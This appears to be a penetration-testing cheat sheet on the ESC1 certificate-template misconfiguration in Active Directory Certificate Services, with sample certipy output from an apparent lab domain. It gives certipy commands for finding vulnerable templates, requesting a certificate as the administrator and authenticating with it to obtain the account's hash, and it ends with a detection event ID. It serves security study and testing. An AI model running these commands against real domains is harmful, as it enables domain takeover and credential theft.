👾 Overview
ESC1 is a common ADCS vulnerability where a misconfigured Certificate Template grants enrollment rights to low-privileged users such as Domain Users, and allows requesters to include a subjectAltName in the CSR. This allows a user to request a certificate as any principal such as a DA.
🔍 Discovery
Certipy is the go to tool for findings and exploiting many common ADCS vulnerabilities.
# Enumerate ADCS vulnerabilities with certipy
certipy-ad find -username [username]@[domain] -password [password] -dc-ip [IP]Running certipy will require a domain user, and it will generate multiple output files including JSONs, these can be manually examined or put into BloodHound.
In the JSON output, certipy will flag a given template as vulnerable:
"1": {
"Template Name": "CorpVPN",
"Display Name": "Corp VPN",
"Certificate Authorities": [
"AUTHORITY-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"AutoEnrollmentCheckUserDsCertificate",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Encrypting File System",
"Secure Email",
"Client Authentication",
"Document Signing",
"IP security IKE intermediate",
"IP security use",
"KDC Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "20 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"AUTHORITY.HTB\\Domain Computers",
"AUTHORITY.HTB\\Domain Admins",
"AUTHORITY.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "AUTHORITY.HTB\\Administrator",
"Write Owner Principals": [
"AUTHORITY.HTB\\Domain Admins",
"AUTHORITY.HTB\\Enterprise Admins",
"AUTHORITY.HTB\\Administrator"
],
"Write Dacl Principals": [
"AUTHORITY.HTB\\Domain Admins",
"AUTHORITY.HTB\\Enterprise Admins",
"AUTHORITY.HTB\\Administrator"
],
"Write Property Principals": [
"AUTHORITY.HTB\\Domain Admins",
"AUTHORITY.HTB\\Enterprise Admins",
"AUTHORITY.HTB\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC1": "'AUTHORITY.HTB\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"
}
},📌 Exploitation
To exploit this, you’ll need to request a certificate using the vulnerable template, and supply the subject you’d like to impersonate, generally the Administrator account.
# Request certificate
sudo certipy-ad req -username [USERNAME]@[DOMAIN] -password [PASSWORD] -target-ip [IP] -ca '[CA NAME]' -template '[VULNERABLE TEMPLATE NAME]' -upn 'administrator@[DOMAIN]'This will generate the certificate [USERNAME].pfx which can be used to authenticate as that user.
✨ Post-Exploitation
You can use certipy-ad auth to authenticate as the impersonated user and grab their hash:
# Authenticate and get the user's hash
sudo certipy-ad auth -pfx '[USERNAME].pfx' -username '[USERNAME]' -domain '[domain]' -dc-ip [ip]🚔 Detection & Evasion
Event 4887: Certificate Services Approved A Certificate Request And Issued A Certificate is emitted when a certificate is issued.
📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| SpecterOps | Certified Pre-Owned |